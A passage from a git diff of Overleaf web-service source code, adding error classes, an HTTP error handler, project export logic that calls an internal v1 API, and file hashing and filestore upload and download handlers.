OErrorV2CompatibleError { + constructor(options) { + super('project not found', options) + } +} + +class UserNotFoundError extends OErrorV2CompatibleError { + constructor(options) { + super('user not found', options) + } +} + +class UserNotCollaboratorError extends OErrorV2CompatibleError { + constructor(options) { + super('user not a collaborator', options) + } +} + +class DocHasRangesError extends OErrorV2CompatibleError { + constructor(options) { + super('document has ranges', options) + } +} + +class InvalidQueryError extends OErrorV2CompatibleError { + constructor(options) { + super('invalid search query', options) + } +} + +class AffiliationError extends OError {} + +class InvalidEmailError extends OError { + get i18nKey() { + return 'invalid_email' + } +} + +class InvalidInstitutionalEmailError extends OError { + get i18nKey() { + return 'invalid_institutional_email' + } +} + +class NonDeletableEntityError extends OError { + get i18nKey() { + return 'non_deletable_entity' + } +} + +module.exports = { + OError, + BackwardCompatibleError, + NotFoundError, + ForbiddenError, + ServiceNotConfiguredError, + 
TooManyRequestsError, + DuplicateNameError, + InvalidNameError, + UnsupportedFileTypeError, + FileTooLargeError, + UnsupportedExportRecordsError, + V1HistoryNotSyncedError, + ProjectHistoryDisabledError, + V1ConnectionError, + UnconfirmedEmailError, + EmailExistsError, + InvalidError, + NotInV2Error, + OutputFileFetchFailedError, + SAMLAssertionAudienceMismatch, + SAMLAuthenticationRequiredError, + SAMLCommonsUnavailable, + SAMLIdentityExistsError, + SAMLAlreadyLinkedError, + SAMLEmailNotAffiliatedError, + SAMLEmailAffiliatedWithAnotherInstitutionError, + SAMLSessionDataMissing, + SAMLAuthenticationError, + SAMLGroupSSOLoginIdentityMismatchError, + SAMLGroupSSOLoginIdentityNotFoundError, + SAMLGroupSSODisabledError, + SAMLInvalidUserAttributeError, + SAMLInvalidUserIdentifierError, + SAMLInvalidSignatureError, + SAMLMissingUserIdentifierError, + SAMLMissingSignatureError, + SAMLProviderRequesterError, + SAMLInvalidResponseError, + SAMLLoginFailureError, + SAMLEmailNotRecognizedError, + SAMLResponseAlreadyProcessedError, + SLInV2Error, + ThirdPartyIdentityExistsError, + ThirdPartyUserNotFoundError, + SubscriptionAdminDeletionError, + SubscriptionNotFoundError, + ProjectNotFoundError, + UserNotFoundError, + UserNotCollaboratorError, + DocHasRangesError, + InvalidQueryError, + AffiliationError, + InvalidEmailError, + InvalidInstitutionalEmailError, + NonDeletableEntityError, +} diff --git a/services/web/app/src/Features/Errors/HttpErrorHandler.js b/services/web/app/src/Features/Errors/HttpErrorHandler.js new file mode 100644 index 0000000..c3fab88 --- /dev/null +++ b/services/web/app/src/Features/Errors/HttpErrorHandler.js @@ -0,0 +1,160 @@ +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const { plainTextResponse } = require('../../infrastructure/Response') + +function renderJSONError(res, message, info = {}) { + if (info.message) { + logger.warn( + info, + `http error info shouldn't contain a 'message' field, will be overridden` + ) + } + if (message != null) { + res.json({ ...info, message }) + } else { + res.json(info) + } +} + +function handleGeneric500Error(req, res, statusCode, message) { + res.status(statusCode) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/500', { title: 'Server Error' }) + case 'json': + return renderJSONError(res, message) + default: + return plainTextResponse(res, 'internal server error') + } +} + +function handleGeneric400Error(req, res, statusCode, message, info = {}) { + res.status(statusCode) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/400', { + title: 'Client Error', + message, + }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'client error') + } +} + +let HttpErrorHandler +module.exports = HttpErrorHandler = { + handleErrorByStatusCode(req, res, err, statusCode) { + const is400Error = statusCode >= 400 && statusCode < 500 + const is500Error = statusCode >= 500 && statusCode < 600 + + req.logger.addFields({ err }) + if (is400Error) { + req.logger.setLevel('warn') + } else if (is500Error) { + req.logger.setLevel('error') + } + + if (statusCode === 403) { + HttpErrorHandler.forbidden(req, res) + } else if (statusCode === 404) { + HttpErrorHandler.notFound(req, res) + } else if (statusCode === 409) { + HttpErrorHandler.conflict(req, res, '') + } else if (statusCode === 422) { + HttpErrorHandler.unprocessableEntity(req, res) + } else if (is400Error) { + handleGeneric400Error(req, 
res, statusCode) + } else if (is500Error) { + handleGeneric500Error(req, res, statusCode) + } else { + res.sendStatus(500) + } + }, + + badRequest(req, res, message, info = {}) { + handleGeneric400Error(req, res, 400, message, info) + }, + + conflict(req, res, message, info = {}) { + res.status(409) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/400', { + title: 'Client Error', + message, + }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'conflict') + } + }, + + forbidden(req, res, message = 'restricted', info = {}) { + res.status(403) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('user/restricted', { title: 'restricted' }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'restricted') + } + }, + + notFound(req, res, message = 'not found', info = {}) { + res.status(404) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/404', { title: 'page_not_found' }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'not found') + } + }, + + unprocessableEntity(req, res, message = 'unprocessable entity', info = {}) { + res.status(422) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/400', { + title: 'Client Error', + message, + }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'unprocessable entity') + } + }, + + legacyInternal(req, res, message, err) { + req.logger.addFields({ err }) + req.logger.setLevel('error') + handleGeneric500Error(req, res, 500, message) + }, + + maintenance(req, res) { + // load balancer health checks require a success response for / + if (req.url === '/') { + res.status(200) + } else { + res.status(503) + } + let message = `${Settings.appName} is currently down for maintenance.` + if (Settings.statusPageUrl) { + message += ` Please check https://${Settings.statusPageUrl} for updates.` + } + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/closed', { title: 'maintenance' }) + case 'json': + return renderJSONError(res, message, {}) + default: + return plainTextResponse(res, message) + } + }, +} diff --git a/services/web/app/src/Features/Exports/ExportsController.mjs b/services/web/app/src/Features/Exports/ExportsController.mjs new file mode 100644 index 0000000..28261cb --- /dev/null +++ b/services/web/app/src/Features/Exports/ExportsController.mjs @@ -0,0 +1,128 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
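+// NOTE (added summary; not part of the original commit): exportProject reads
+// project_id and brand_variation_id from req.params plus optional metadata
+// from req.body and replies with { export_v1_id, message }; exportStatus
+// replies with { export_json: { status_summary, status_detail, ... } }.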
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+import ExportsHandler from './ExportsHandler.mjs'
+
+import SessionManager from '../Authentication/SessionManager.js'
+import logger from '@overleaf/logger'
+
+export default {
+  exportProject(req, res, next) {
+    const { project_id: projectId, brand_variation_id: brandVariationId } =
+      req.params
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    const exportParams = {
+      project_id: projectId,
+      brand_variation_id: brandVariationId,
+      user_id: userId,
+    }
+
+    if (req.body) {
+      if (req.body.firstName) {
+        exportParams.first_name = req.body.firstName.trim()
+      }
+      if (req.body.lastName) {
+        exportParams.last_name = req.body.lastName.trim()
+      }
+      // additional parameters for gallery exports
+      if (req.body.title) {
+        exportParams.title = req.body.title.trim()
+      }
+      if (req.body.description) {
+        exportParams.description = req.body.description.trim()
+      }
+      if (req.body.author) {
+        exportParams.author = req.body.author.trim()
+      }
+      if (req.body.license) {
+        exportParams.license = req.body.license.trim()
+      }
+      if (req.body.showSource != null) {
+        exportParams.show_source = req.body.showSource
+      }
+    }
+
+    return ExportsHandler.exportProject(
+      exportParams,
+      function (err, exportData) {
+        if (err != null) {
+          if (err.forwardResponse != null) {
+            logger.debug(
+              { responseError: err.forwardResponse },
+              'forwarding response'
+            )
+            const statusCode = err.forwardResponse.status || 500
+            return res.status(statusCode).json(err.forwardResponse)
+          } else {
+            return next(err)
+          }
+        }
+        logger.debug(
+          {
+            userId,
+            projectId,
+            brandVariationId,
+            exportV1Id: exportData.v1_id,
+          },
+          'exported project'
+        )
+        return res.json({
+          export_v1_id: exportData.v1_id,
+          message: exportData.message,
+        })
+      }
+    )
+  },
+
+  exportStatus(req, res) {
+    const { export_id: exportId } = req.params
+    return ExportsHandler.fetchExport(exportId, function (err, exportJson) {
+      let json
+      if (err != null) {
+        json = {
+          status_summary: 'failed',
+          status_detail: err.toString(),
+        }
+        res.json({ export_json: json })
+        return
+      }
+      const parsedExport = JSON.parse(exportJson)
+      json = {
+        status_summary: parsedExport.status_summary,
+        status_detail: parsedExport.status_detail,
+        partner_submission_id: parsedExport.partner_submission_id,
+        v2_user_email: parsedExport.v2_user_email,
+        v2_user_first_name: parsedExport.v2_user_first_name,
+        v2_user_last_name: parsedExport.v2_user_last_name,
+        title: parsedExport.title,
+        token: parsedExport.token,
+      }
+      return res.json({ export_json: json })
+    })
+  },
+
+  exportDownload(req, res, next) {
+    const { type, export_id: exportId } = req.params
+
+    SessionManager.getLoggedInUserId(req.session)
+    return ExportsHandler.fetchDownload(
+      exportId,
+      type,
+      function (err, exportFileUrl) {
+        if (err != null) {
+          return next(err)
+        }
+
+        return res.redirect(exportFileUrl)
+      }
+    )
+  },
+}
diff --git a/services/web/app/src/Features/Exports/ExportsHandler.mjs b/services/web/app/src/Features/Exports/ExportsHandler.mjs
new file mode 100644
index 0000000..4ef5fea
--- /dev/null
+++ b/services/web/app/src/Features/Exports/ExportsHandler.mjs
@@ -0,0 +1,282 @@
+/* eslint-disable
+  n/handle-callback-err,
+  max-len,
+  no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
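+// NOTE (added summary; not part of the original commit): _buildExport
+// gathers project, rootDoc (which depends on project), user and
+// historyVersion via async.auto, then _requestExport POSTs the assembled
+// exportData to the v1 API, which responds with { exportId, message }.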
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import OError from '@overleaf/o-error' +import ProjectGetter from '../Project/ProjectGetter.js' +import ProjectHistoryHandler from '../Project/ProjectHistoryHandler.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import ProjectRootDocManager from '../Project/ProjectRootDocManager.js' +import UserGetter from '../User/UserGetter.js' +import logger from '@overleaf/logger' +import settings from '@overleaf/settings' +import async from 'async' +import Request from 'request' +let ExportsHandler +const request = Request.defaults() + +export default ExportsHandler = { + exportProject(exportParams, callback) { + if (callback == null) { + callback = function () {} + } + return ExportsHandler._buildExport( + exportParams, + function (err, exportData) { + if (err != null) { + return callback(err) + } + return ExportsHandler._requestExport(exportData, function (err, body) { + if (err != null) { + return callback(err) + } + exportData.v1_id = body.exportId + exportData.message = body.message + // TODO: possibly store the export data in Mongo + return callback(null, exportData) + }) + } + ) + }, + + _buildExport(exportParams, callback) { + if (callback == null) { + callback = function () {} + } + const { + project_id: projectId, + user_id: userId, + brand_variation_id: brandVariationId, + title, + description, + author, + license, + show_source: showSource, + } = exportParams + const jobs = { + project(cb) { + return ProjectGetter.getProject(projectId, cb) + }, + rootDoc: [ + 'project', + (results, cb) => + ProjectRootDocManager.ensureRootDocumentIsValid( + projectId, + function (error) { + if (error != null) { + return callback(error) + } + return ProjectLocator.findRootDoc( + { project: results.project, project_id: projectId }, + cb + ) + } + ), + ], + user(cb) { + return UserGetter.getUser( + userId, + { first_name: 1, last_name: 1, email: 1, overleaf: 1 }, + cb + ) + }, + historyVersion(cb) { + return ProjectHistoryHandler.ensureHistoryExistsForProject( + projectId, + function (error) { + if (error != null) { + return callback(error) + } + return ExportsHandler._requestVersion(projectId, cb) + } + ) + }, + } + + return async.auto(jobs, function (err, results) { + if (err != null) { + OError.tag(err, 'error building project export', { + project_id: projectId, + user_id: userId, + brand_variation_id: brandVariationId, + }) + return callback(err) + } + + const { project, rootDoc, user, historyVersion } = results + if (!rootDoc || rootDoc[1] == null) { + err = new OError('cannot export project without root doc', { + project_id: projectId, + }) + return callback(err) + } + + if (exportParams.first_name && exportParams.last_name) { + user.first_name = exportParams.first_name + user.last_name = exportParams.last_name + } + + const exportData = { + project: { + id: projectId, + rootDocPath: rootDoc[1] != null ? rootDoc[1].fileSystem : undefined, + historyId: project.overleaf?.history?.id, + historyVersion, + v1ProjectId: + project.overleaf != null ? 
project.overleaf.id : undefined, + metadata: { + compiler: project.compiler, + imageName: project.imageName, + title, + description, + author, + license, + showSource, + }, + }, + user: { + id: userId, + firstName: user.first_name, + lastName: user.last_name, + email: user.email, + orcidId: null, // until v2 gets ORCID + v1UserId: user.overleaf != null ? user.overleaf.id : undefined, + }, + destination: { + brandVariationId, + }, + options: { + callbackUrl: null, + }, // for now, until we want v1 to call us back + } + return callback(null, exportData) + }) + }, + + _requestExport(exportData, callback) { + if (callback == null) { + callback = function () {} + } + return request.post( + { + url: `${settings.apis.v1.url}/api/v1/overleaf/exports`, + auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass }, + json: exportData, + timeout: settings.apis.v1.timeout, + }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error making request to v1 export', { + export: exportData, + }) + return callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null, body) + } else { + logger.warn( + { export: exportData }, + `v1 export returned failure; forwarding: ${body}` + ) + // pass the v1 error along for the publish modal to handle + const err = { forwardResponse: body } + return callback(err) + } + } + ) + }, + + _requestVersion(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${settings.apis.project_history.url}/project/${projectId}/version`, + json: true, + }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error making request to project history', { + project_id: projectId, + }) + return callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null, body.version) + } else { + err = new OError( + `project history version returned a failure status code: ${res.statusCode}`, + { project_id: projectId } + ) + return callback(err) + } + } + ) + }, + + fetchExport(exportId, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${settings.apis.v1.url}/api/v1/overleaf/exports/${exportId}`, + auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass }, + timeout: settings.apis.v1.timeout, + }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error making request to v1 export', { + export: exportId, + }) + return callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null, body) + } else { + err = new OError( + `v1 export returned a failure status code: ${res.statusCode}`, + { export: exportId } + ) + return callback(err) + } + } + ) + }, + + fetchDownload(exportId, type, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${settings.apis.v1.url}/api/v1/overleaf/exports/${exportId}/${type}_url`, + auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass }, + timeout: settings.apis.v1.timeout, + }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error making request to v1 export', { + export: exportId, + }) + return callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null, body) + } else { + err = new OError( + `v1 export returned a failure status code: ${res.statusCode}`, + { export: exportId } + ) + return callback(err) + } + } + ) + }, +} diff --git 
a/services/web/app/src/Features/FileStore/FileHashManager.js b/services/web/app/src/Features/FileStore/FileHashManager.js new file mode 100644 index 0000000..e90f93b --- /dev/null +++ b/services/web/app/src/Features/FileStore/FileHashManager.js @@ -0,0 +1,61 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let FileHashManager +const crypto = require('crypto') +const logger = require('@overleaf/logger') +const fs = require('fs') +const _ = require('lodash') + +module.exports = FileHashManager = { + computeHash(filePath, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) // avoid double callbacks + + // taken from v1/history/storage/lib/blob_hash.js + const getGitBlobHeader = byteLength => `blob ${byteLength}` + '\x00' + + const getByteLengthOfFile = cb => + fs.stat(filePath, function (err, stats) { + if (err != null) { + return cb(err) + } + return cb(null, stats.size) + }) + + return getByteLengthOfFile(function (err, byteLength) { + if (err != null) { + return callback(err) + } + + const input = fs.createReadStream(filePath) + input.on('error', function (err) { + logger.warn({ filePath, err }, 'error opening file in computeHash') + return callback(err) + }) + + const hash = crypto.createHash('sha1') + hash.setEncoding('hex') + hash.update(getGitBlobHeader(byteLength)) + hash.on('readable', function () { + const result = hash.read() + if (result != null) { + return callback(null, result.toString('hex')) + } + }) + return input.pipe(hash) + }) + }, +} diff --git a/services/web/app/src/Features/FileStore/FileStoreController.mjs b/services/web/app/src/Features/FileStore/FileStoreController.mjs new file mode 100644 index 0000000..e4e55c7 --- /dev/null +++ b/services/web/app/src/Features/FileStore/FileStoreController.mjs @@ -0,0 +1,207 @@ +// @ts-check + +import { pipeline } from 'node:stream/promises' +import logger from '@overleaf/logger' +import { expressify } from '@overleaf/promise-utils' +import Metrics from '@overleaf/metrics' +import FileStoreHandler from './FileStoreHandler.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import HistoryManager from '../History/HistoryManager.js' +import Errors from '../Errors/Errors.js' +import Features from '../../infrastructure/Features.js' +import { preparePlainTextResponse } from '../../infrastructure/Response.js' + +async function getFile(req, res) { + const projectId = req.params.Project_id + const fileId = req.params.File_id + const queryString = req.query + const userAgent = req.get('User-Agent') + req.logger.addFields({ projectId, fileId, queryString }) + + let file + try { + ;({ element: file } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: fileId, + type: 'file', + })) + } catch (err) { + if (err instanceof Errors.NotFoundError) { + logger.warn( + { err, projectId, fileId, queryString }, + 'entity not found when downloading file' + ) + // res.sendStatus() sends a description of the status as body. + // Using res.status().end() avoids sending that fake body. 
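+      // (res.sendStatus(404) would send the literal body 'Not Found'.)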
+ return res.status(404).end() + } else { + // Instead of using the global error handler, we send an empty response in + // case the client forgets to check the response status. This is arguably + // not our responsibility, and it won't work if something else breaks in + // this endpoint, so it could be revisited in the future. + logger.err( + { err, projectId, fileId, queryString }, + 'error finding element for downloading file' + ) + return res.status(500).end() + } + } + + // This metric has this name because it used to be recorded in a middleware. + // It tracks how many files have a hash and can be served by the history + // system. + Metrics.inc('fileToBlobRedirectMiddleware', 1, { + method: 'GET', + status: Boolean(file?.hash), + }) + + let source, stream, contentLength + try { + if (Features.hasFeature('project-history-blobs') && file?.hash) { + // Get the file from history + ;({ source, stream, contentLength } = + await HistoryManager.promises.requestBlobWithFallback( + projectId, + file.hash, + fileId + )) + } else { + // The file-hash is missing. Fall back to filestore. + stream = await FileStoreHandler.promises.getFileStream( + projectId, + fileId, + queryString + ) + source = 'filestore' + } + } catch (err) { + if (err instanceof Errors.NotFoundError) { + return res.status(404).end() + } else { + logger.err( + { err, projectId, fileId, queryString }, + 'error finding element for downloading file' + ) + return res.status(500).end() + } + } + + // mobile safari will try to render html files, prevent this + if (isMobileSafari(userAgent) && isHtml(file)) { + preparePlainTextResponse(res) + } + if (contentLength) { + res.setHeader('Content-Length', contentLength) + } + res.setContentDisposition('attachment', { filename: file.name }) + // allow the browser to cache these immutable files + // note: both "private" and "max-age" appear to be required for caching + res.setHeader('Cache-Control', 'private, max-age=3600') + res.appendHeader('X-Served-By', source) + try { + await pipeline(stream, res) + } catch (err) { + if ( + err instanceof Error && + 'code' in err && + err.code === 'ERR_STREAM_PREMATURE_CLOSE' + ) { + // Ignore clients closing the connection prematurely + return + } + throw err + } +} + +async function getFileHead(req, res) { + const projectId = req.params.Project_id + const fileId = req.params.File_id + + let file + try { + ;({ element: file } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: fileId, + type: 'file', + })) + } catch (err) { + if (err instanceof Errors.NotFoundError) { + // res.sendStatus() sends a description of the status as body. + // Using res.status().end() avoids sending that fake body. + return res.status(404).end() + } else { + // Instead of using the global error handler, we send an empty response in + // case the client forgets to check the response status. This is arguably + // not our responsibility, and it won't work if something else breaks in + // this endpoint, so it could be revisited in the future. + logger.err( + { err, projectId, fileId }, + 'error finding element for downloading file' + ) + return res.status(500).end() + } + } + + // This metric has this name because it used to be recorded in a middleware. + // It tracks how many files have a hash and can be served by the history + // system. 
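+  // A `status` label of true means the file has a hash and can be served
+  // from history blobs; false means it must fall back to the legacy filestore.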
+ Metrics.inc('fileToBlobRedirectMiddleware', 1, { + method: 'HEAD', + status: Boolean(file?.hash), + }) + + let fileSize, source + try { + if (Features.hasFeature('project-history-blobs') && file?.hash) { + ;({ source, contentLength: fileSize } = + await HistoryManager.promises.requestBlobWithFallback( + projectId, + file.hash, + fileId, + 'HEAD' + )) + } else { + fileSize = await FileStoreHandler.promises.getFileSize(projectId, fileId) + source = 'filestore' + } + } catch (err) { + if (err instanceof Errors.NotFoundError) { + return res.status(404).end() + } else { + logger.err({ err, projectId, fileId }, 'error obtaining file size') + return res.status(500).end() + } + } + + res.setHeader('Content-Length', fileSize) + res.appendHeader('X-Served-By', source) + res.status(200).end() +} + +function isHtml(file) { + return ( + fileEndsWith(file, '.html') || + fileEndsWith(file, '.htm') || + fileEndsWith(file, '.xhtml') + ) +} + +function fileEndsWith(file, ext) { + return ( + file.name != null && + file.name.length > ext.length && + file.name.lastIndexOf(ext) === file.name.length - ext.length + ) +} + +function isMobileSafari(userAgent) { + return ( + userAgent && + (userAgent.indexOf('iPhone') >= 0 || userAgent.indexOf('iPad') >= 0) + ) +} + +export default { + getFile: expressify(getFile), + getFileHead: expressify(getFileHead), +} diff --git a/services/web/app/src/Features/FileStore/FileStoreHandler.js b/services/web/app/src/Features/FileStore/FileStoreHandler.js new file mode 100644 index 0000000..66ba94b --- /dev/null +++ b/services/web/app/src/Features/FileStore/FileStoreHandler.js @@ -0,0 +1,372 @@ +const _ = require('lodash') +const logger = require('@overleaf/logger') +const fs = require('fs') +const request = require('request') +const settings = require('@overleaf/settings') +const Async = require('async') +const FileHashManager = require('./FileHashManager') +const HistoryManager = require('../History/HistoryManager') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') +const { File } = require('../../models/File') +const Errors = require('../Errors/Errors') +const OError = require('@overleaf/o-error') +const { promisifyAll } = require('@overleaf/promise-utils') +const Features = require('../../infrastructure/Features') + +const ONE_MIN_IN_MS = 60 * 1000 +const FIVE_MINS_IN_MS = ONE_MIN_IN_MS * 5 + +const FileStoreHandler = { + RETRY_ATTEMPTS: 3, + + uploadFileFromDisk(projectId, fileArgs, fsPath, callback) { + // Look up the history id for the project if we don't have it already + ProjectDetailsHandler.getDetails(projectId, function (err, project) { + if (err) { + return callback(err) + } + const historyId = project.overleaf?.history?.id + if (!historyId) { + return callback(new OError('missing history id')) + } + FileStoreHandler.uploadFileFromDiskWithHistoryId( + projectId, + historyId, + fileArgs, + fsPath, + callback + ) + }) + }, + + _uploadToHistory(historyId, hash, size, fsPath, callback) { + if (Features.hasFeature('project-history-blobs')) { + Async.retry( + FileStoreHandler.RETRY_ATTEMPTS, + cb => + HistoryManager.uploadBlobFromDisk(historyId, hash, size, fsPath, cb), + error => { + if (error) return callback(error, false) + callback(null, true) + } + ) + } else { + callback(null, false) + } + }, + + _uploadToFileStore(projectId, fileArgs, fsPath, callback) { + Async.retry( + FileStoreHandler.RETRY_ATTEMPTS, + (cb, results) => + FileStoreHandler._doUploadFileFromDisk(projectId, fileArgs, fsPath, cb), + callback + ) + }, + + 
uploadFileFromDiskWithHistoryId(
+    projectId,
+    historyId,
+    fileArgs,
+    fsPath,
+    callback
+  ) {
+    fs.lstat(fsPath, function (err, stat) {
+      if (err) {
+        logger.warn({ err, projectId, fileArgs, fsPath }, 'error stating file')
+        return callback(err)
+      }
+      if (!stat) {
+        logger.warn(
+          { projectId, fileArgs, fsPath },
+          'stat is not available, can not check file from disk'
+        )
+        return callback(new Error('error getting stat, not available'))
+      }
+      if (!stat.isFile()) {
+        logger.debug(
+          { projectId, fileArgs, fsPath },
+          'tried to upload symlink, not continuing'
+        )
+        return callback(new Error('can not upload symlink'))
+      }
+      FileHashManager.computeHash(fsPath, function (err, hash) {
+        if (err) {
+          return callback(err)
+        }
+        FileStoreHandler._uploadToHistory(
+          historyId,
+          hash,
+          stat.size,
+          fsPath,
+          function (err, createdBlob) {
+            if (err) {
+              return callback(err)
+            }
+            fileArgs = { ...fileArgs, hash }
+            FileStoreHandler._uploadToFileStore(
+              projectId,
+              fileArgs,
+              fsPath,
+              function (err, result) {
+                if (err) {
+                  OError.tag(err, 'Error uploading file, retries failed', {
+                    projectId,
+                    fileArgs,
+                  })
+                  return callback(err)
+                }
+                callback(err, result.url, result.fileRef, createdBlob)
+              }
+            )
+          }
+        )
+      })
+    })
+  },
+
+  _doUploadFileFromDisk(projectId, fileArgs, fsPath, callback) {
+    const callbackOnce = _.once(callback)
+
+    const fileRef = new File(fileArgs)
+    const fileId = fileRef._id
+    const url = FileStoreHandler._buildUrl(projectId, fileId)
+
+    if (!Features.hasFeature('filestore')) {
+      return callbackOnce(null, { url, fileRef })
+    }
+
+    const readStream = fs.createReadStream(fsPath)
+    readStream.on('error', function (err) {
+      logger.warn(
+        { err, projectId, fileId, fsPath },
+        'something went wrong on the read stream of uploadFileFromDisk'
+      )
+      callbackOnce(err)
+    })
+    readStream.on('open', function () {
+      const opts = {
+        method: 'post',
+        uri: url,
+        timeout: FIVE_MINS_IN_MS,
+        headers: {
+          'X-File-Hash-From-Web': fileArgs.hash,
+        }, // send the hash to the filestore as a custom header so it can be checked
+      }
+      const writeStream = request(opts)
+      writeStream.on('error', function (err) {
+        logger.warn(
+          { err, projectId, fileId, fsPath },
+          'something went wrong on the write stream of uploadFileFromDisk'
+        )
+        callbackOnce(err)
+      })
+      writeStream.on('response', function (response) {
+        if (![200, 201].includes(response.statusCode)) {
+          const err = new OError(
+            `non-ok response from filestore for upload: ${response.statusCode}`,
+            { statusCode: response.statusCode }
+          )
+          return callbackOnce(err)
+        }
+        callbackOnce(null, { url, fileRef })
+      }) // have to pass back an object because async.retry only accepts a single result argument
+      readStream.pipe(writeStream)
+    })
+  },
+
+  getFileStreamNew(project, file, query, callback) {
+    const projectId = project._id
+    const historyId = project.overleaf?.history?.id
+    const fileId = file._id
+    const hash = file.hash
+    if (historyId && hash && Features.hasFeature('project-history-blobs')) {
+      // new behaviour - request from history
+      const range = _extractRange(query?.range)
+      HistoryManager.requestBlobWithFallback(
+        projectId,
+        hash,
+        fileId,
+        'GET',
+        range,
+        function (err, result) {
+          if (err) {
+            return callback(err)
+          }
+          const { stream } = result
+          callback(null, stream)
+        }
+      )
+    } else {
+      // original behaviour
+      FileStoreHandler.getFileStream(projectId, fileId, query, callback)
+    }
+  },
+
+  getFileStream(projectId, fileId, query, callback) {
+    if (!Features.hasFeature('filestore')) {
+      return callback(
+        new
Errors.NotFoundError('filestore is disabled, file not found') + ) + } + + let queryString = '?from=getFileStream' + if (query != null && query.format != null) { + queryString += `&format=${query.format}` + } + const opts = { + method: 'get', + uri: `${this._buildUrl(projectId, fileId)}${queryString}`, + timeout: FIVE_MINS_IN_MS, + headers: {}, + } + if (query != null && query.range != null) { + const rangeText = query.range + if (rangeText && rangeText.match != null && rangeText.match(/\d+-\d+/)) { + opts.headers.range = `bytes=${query.range}` + } + } + const readStream = request(opts) + readStream.on('error', err => + logger.err( + { err, projectId, fileId, query, opts }, + 'error in file stream' + ) + ) + callback(null, readStream) + }, + + getFileSize(projectId, fileId, callback) { + const url = this._buildUrl(projectId, fileId) + request.head(`${url}?from=getFileSize`, (err, res) => { + if (err) { + OError.tag(err, 'failed to get file size from filestore', { + projectId, + fileId, + }) + return callback(err) + } + if (res.statusCode === 404) { + return callback(new Errors.NotFoundError('file not found in filestore')) + } + if (res.statusCode !== 200) { + logger.warn( + { projectId, fileId, statusCode: res.statusCode }, + 'filestore returned non-200 response' + ) + return callback(new Error('filestore returned non-200 response')) + } + const fileSize = res.headers['content-length'] + callback(null, fileSize) + }) + }, + + deleteFile(projectId, fileId, callback) { + logger.debug({ projectId, fileId }, 'telling file store to delete file') + const opts = { + method: 'delete', + uri: this._buildUrl(projectId, fileId), + timeout: FIVE_MINS_IN_MS, + } + request(opts, function (err, response) { + if (err) { + logger.warn( + { err, projectId, fileId }, + 'something went wrong deleting file from filestore' + ) + } + callback(err) + }) + }, + + deleteProject(projectId, callback) { + if (!Features.hasFeature('filestore')) { + return callback() // if filestore is not in use, we don't need to delete anything + } + request( + { + method: 'delete', + uri: this._buildUrl(projectId), + timeout: FIVE_MINS_IN_MS, + }, + err => { + if (err) { + return callback( + OError.tag( + err, + 'something went wrong deleting a project in filestore', + { projectId } + ) + ) + } + callback() + } + ) + }, + + copyFile(oldProjectId, oldFileId, newProjectId, newFileId, callback) { + logger.debug( + { oldProjectId, oldFileId, newProjectId, newFileId }, + 'telling filestore to copy a file' + ) + const opts = { + method: 'put', + json: { + source: { + project_id: oldProjectId, + file_id: oldFileId, + }, + }, + uri: this._buildUrl(newProjectId, newFileId), + timeout: FIVE_MINS_IN_MS, + } + request(opts, function (err, response) { + if (err) { + OError.tag( + err, + 'something went wrong telling filestore api to copy file', + { + oldProjectId, + oldFileId, + newProjectId, + newFileId, + } + ) + callback(err) + } else if (response.statusCode >= 200 && response.statusCode < 300) { + // successful response + callback(null, opts.uri) + } else { + err = new OError( + `non-ok response from filestore for copyFile: ${response.statusCode}`, + { + uri: opts.uri, + statusCode: response.statusCode, + } + ) + callback(err) + } + }) + }, + + _buildUrl(projectId, fileId) { + return ( + `${settings.apis.filestore.url}/project/${projectId}` + + (fileId ? 
`/file/${fileId}` : '')
